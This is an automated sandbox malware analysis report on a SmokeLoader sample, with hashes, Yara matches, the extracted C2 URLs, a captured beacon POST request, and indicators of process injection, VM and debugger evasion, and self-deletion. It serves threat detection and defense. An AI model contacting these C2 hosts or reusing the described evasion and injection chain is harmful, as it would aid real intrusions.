Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b8E3zd5AYc.exe

Overview

General Information

Sample Name:b8E3zd5AYc.exe
Analysis ID:715083
MD5:2072a0a726904aed8c39095f36efd296
SHA1:29754dea5a1fb0a2ff054279a3030d84579fad15
SHA256:9ae4d00a359aa5facd231470b9a92b0542c6f8afa6e981dce7b171a08f635287
Tags:exeRecordBreaker
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • b8E3zd5AYc.exe (PID: 5104 cmdline: C:\Users\user\Desktop\b8E3zd5AYc.exe MD5: 2072A0A726904AED8C39095F36EFD296)
    • b8E3zd5AYc.exe (PID: 5976 cmdline: C:\Users\user\Desktop\b8E3zd5AYc.exe MD5: 2072A0A726904AED8C39095F36EFD296)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • vwhdahh (PID: 2952 cmdline: C:\Users\user\AppData\Roaming\vwhdahh MD5: 2072A0A726904AED8C39095F36EFD296)
    • vwhdahh (PID: 6104 cmdline: C:\Users\user\AppData\Roaming\vwhdahh MD5: 2072A0A726904AED8C39095F36EFD296)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.426233930.00000000007B8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x4984:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries
      SourceRuleDescriptionAuthorStrings
      6.0.vwhdahh.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        1.2.b8E3zd5AYc.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0.2.b8E3zd5AYc.exe.6e15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            6.0.vwhdahh.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              6.2.vwhdahh.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: b8E3zd5AYc.exeReversingLabs: Detection: 43%
                Source: b8E3zd5AYc.exeVirustotal: Detection: 36%Perma Link
                Source: http://host-host-file8.com/URL Reputation: Label: malware
                Source: host-file-host6.comVirustotal: Detection: 21%Perma Link
                Source: host-host-file8.comVirustotal: Detection: 21%Perma Link
                Source: C:\Users\user\AppData\Roaming\vwhdahhReversingLabs: Detection: 43%
                Source: C:\Users\user\AppData\Roaming\vwhdahhVirustotal: Detection: 36%Perma Link
                Source: b8E3zd5AYc.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\vwhdahhJoe Sandbox ML: detected
                Source: 6.0.vwhdahh.400000.2.unpackAvira: Label: TR/Patched.Gen
                Source: 6.0.vwhdahh.400000.3.unpackAvira: Label: TR/Patched.Gen
                Source: 6.0.vwhdahh.400000.0.unpackAvira: Label: TR/Patched.Gen
                Source: 6.0.vwhdahh.400000.1.unpackAvira: Label: TR/Patched.Gen
                Source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                Source: b8E3zd5AYc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: VC:\ruvodejet xufututowik mehumexiz\ciz-legerawujewo\xahahes.pdbH source: b8E3zd5AYc.exe, vwhdahh.2.dr
                Source: Binary string: C:\ruvodejet xufututowik mehumexiz\ciz-legerawujewo\xahahes.pdb source: b8E3zd5AYc.exe, vwhdahh.2.dr

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: Malware configuration extractorURLs: http://host-file-host6.com/
                Source: Malware configuration extractorURLs: http://host-host-file8.com/
                Source: Joe Sandbox ViewASN Name: GULFSTREAMUA GULFSTREAMUA
                Source: Joe Sandbox ViewIP Address: 176.124.192.17 176.124.192.17
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://turbbv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: host-file-host6.com
                Source: explorer.exe, 00000002.00000000.349059881.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.367736313.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.317150379.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://turbbv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: host-file-host6.com
                Source: unknownDNS traffic detected: queries for: host-file-host6.com

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 6.0.vwhdahh.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.b8E3zd5AYc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.b8E3zd5AYc.exe.6e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vwhdahh.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.vwhdahh.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vwhdahh.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.vwhdahh.6115a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: b8E3zd5AYc.exe, 00000000.00000002.306080518.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 00000005.00000002.426233930.00000000007B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.306092360.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: b8E3zd5AYc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000005.00000002.426233930.00000000007B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.306092360.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_0040872B0_2_0040872B
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_0040872B5_2_0040872B
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00610110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_00610110
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_0040180C Sleep,NtTerminateProcess,6_2_0040180C
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_00401818 Sleep,NtTerminateProcess,6_2_00401818
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_00401822 Sleep,NtTerminateProcess,6_2_00401822
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_00401826 Sleep,NtTerminateProcess,6_2_00401826
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_00401834 Sleep,NtTerminateProcess,6_2_00401834
                Source: b8E3zd5AYc.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: vwhdahh.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: b8E3zd5AYc.exeReversingLabs: Detection: 43%
                Source: b8E3zd5AYc.exeVirustotal: Detection: 36%
                Source: b8E3zd5AYc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\b8E3zd5AYc.exe C:\Users\user\Desktop\b8E3zd5AYc.exe
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeProcess created: C:\Users\user\Desktop\b8E3zd5AYc.exe C:\Users\user\Desktop\b8E3zd5AYc.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\vwhdahh C:\Users\user\AppData\Roaming\vwhdahh
                Source: C:\Users\user\AppData\Roaming\vwhdahhProcess created: C:\Users\user\AppData\Roaming\vwhdahh C:\Users\user\AppData\Roaming\vwhdahh
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeProcess created: C:\Users\user\Desktop\b8E3zd5AYc.exe C:\Users\user\Desktop\b8E3zd5AYc.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhProcess created: C:\Users\user\AppData\Roaming\vwhdahh C:\Users\user\AppData\Roaming\vwhdahhJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vwhdahhJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/1
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_008ECEAA CreateToolhelp32Snapshot,Module32First,0_2_008ECEAA
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00403304 GetComputerNameExW,FindResourceA,IsBadWritePtr,GlobalGetAtomNameW,DebugBreak,FileTimeToDosDateTime,LocalSize,VerifyVersionInfoW,0_2_00403304
                Source: b8E3zd5AYc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: VC:\ruvodejet xufututowik mehumexiz\ciz-legerawujewo\xahahes.pdbH source: b8E3zd5AYc.exe, vwhdahh.2.dr
                Source: Binary string: C:\ruvodejet xufututowik mehumexiz\ciz-legerawujewo\xahahes.pdb source: b8E3zd5AYc.exe, vwhdahh.2.dr
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00404930 push eax; ret 0_2_0040494E
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00406ED9 push ecx; ret 0_2_00406EEC
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_008F2C49 pushad ; iretd 0_2_008F2C4F
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_008EDDA8 push ebx; iretd 0_2_008EDDE8
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_008EDDBD push ebx; iretd 0_2_008EDDE8
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00404930 push eax; ret 5_2_0040494E
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00406ED9 push ecx; ret 5_2_00406EEC
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00611970 push ebx; iretd 5_2_006119B7
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00611977 push ebx; iretd 5_2_006119B7
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_0061198B push ebx; iretd 5_2_006119B7
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_004011D0 push ebx; iretd 6_2_00401217
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_004011D7 push ebx; iretd 6_2_00401217
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 6_2_004011EB push ebx; iretd 6_2_00401217
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_004033AB LoadLibraryA,GetProcAddress,VirtualProtect,0_2_004033AB
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vwhdahhJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vwhdahhJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\b8e3zd5ayc.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vwhdahh:Zone.Identifier read attributes | deleteJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: vwhdahh, 00000006.00000002.437134759.00000000006EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 4360Thread sleep count: 623 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5140Thread sleep count: 388 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5140Thread sleep time: -38800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 4332Thread sleep count: 447 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4332Thread sleep time: -44700s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 4508Thread sleep count: 580 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5044Thread sleep count: 339 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5044Thread sleep time: -33900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5852Thread sleep count: 286 > 30Jump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5168
                Source: C:\Users\user\AppData\Roaming\vwhdahhEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-4860
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 623Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 388Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 447Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 580Jump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeSystem information queried: ModuleInformationJump to behavior
                Source: explorer.exe, 00000002.00000000.356818409.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000002.00000000.383134992.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                Source: explorer.exe, 00000002.00000000.383134992.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.350913612.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.383134992.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: explorer.exe, 00000002.00000000.356818409.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00405424 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00405424
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_004033AB LoadLibraryA,GetProcAddress,VirtualProtect,0_2_004033AB
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_008EC787 push dword ptr fs:[00000030h]0_2_008EC787
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00610042 push dword ptr fs:[00000030h]5_2_00610042
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00405424 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00405424
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00404C9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00404C9B
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_004070BE SetUnhandledExceptionFilter,0_2_004070BE
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00406D7C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00406D7C
